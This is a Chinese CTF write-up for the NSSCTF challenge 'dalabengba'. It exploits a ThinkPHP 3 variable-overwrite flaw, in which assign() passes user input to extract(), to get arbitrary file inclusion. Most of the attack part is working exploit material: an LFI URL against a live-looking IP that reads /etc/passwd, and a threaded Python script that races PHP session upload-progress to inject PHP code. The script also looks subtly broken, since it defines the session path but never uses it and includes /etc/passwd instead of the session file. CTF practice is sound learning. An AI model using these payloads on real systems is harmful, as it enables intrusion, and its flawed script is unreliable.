编程语言
首页 > 编程语言> > NSSCTF dalabengba(thinkphp)

NSSCTF dalabengba(thinkphp)

作者:互联网

最近学了点thinkphp,于是想复现一道NSSCTF上的原题

直接下载附件,可以看到是thinkphp的格式

查看IndexController.class.php

<?php
namespace Home\Controller;
use Think\Controller;
class IndexController extends Controller {
    public function index($doge=''){
        if(preg_grep('/flag|Home|Common\/21/i',$doge)){
            die("<dialog open>Get Out Hacker!</dialog>");
        }else{
            $this->assign($doge);
            $this->display();
        }
    }
}

参考这篇文章
https://www.cnblogs.com/zpchcbd/p/11949672.html

大概的调用过程(摘自freebuf)

图片

传入的数组变量$doge最后赋值给$vars,从而可以使用extract()函数会对其进行变量覆盖

public function load($_filename,$vars=null)
{
if(!is_null($vars)){ extract($vars, EXTR_OVERWRITE); 
} include $_filename; //进行包含文件的操作 }

传入$doge为array(['_filename'=>'/etc/passwd'])
构造url可形成任意文件包含漏洞

http://1.14.71.254:28039//index.php?g=index&m=home&a=index&doge[_filename]=/etc/passwd

图片

后续只需要利用条件竞争把文件传上去即可

import io
import sys
import requests
import threading

sessid = 'aaa'
sess_path='/tmp'
url='http://1.14.71.254:28039/'

def WRITE(session):
    while True:
        f = io.BytesIO(b'x' * 1024 * 50)
        session.post(
            url=url,
            data={"PHP_SESSION_UPLOAD_PROGRESS":f"<?=phpinfo();file_get_contents('flag.php');?>"},
            files={"file":('xxx.txt', f)},
            cookies={'PHPSESSID':sessid}
        )

def READ(session):
    while True:
        response = session.get(f'http://1.14.71.254:28039//index.php?g=index&m=home&a=index&doge[_filename]=/etc/passwd')
        if 'upload_progress_' in response.text:
            print(response.text)
            sys.exit(0)
        else:
            print('++++++retry++++++')

def main():
    with requests.session() as session:
        t1 = threading.Thread(target=WRITE, args=(session,))
        t1.daemon = True
        t1.start()
        READ(session)
if __name__ == '__main__':
    main()

标签:__,index,vars,doge,filename,session,dalabengba,thinkphp,NSSCTF
来源: https://www.cnblogs.com/nov1ce/p/15786637.html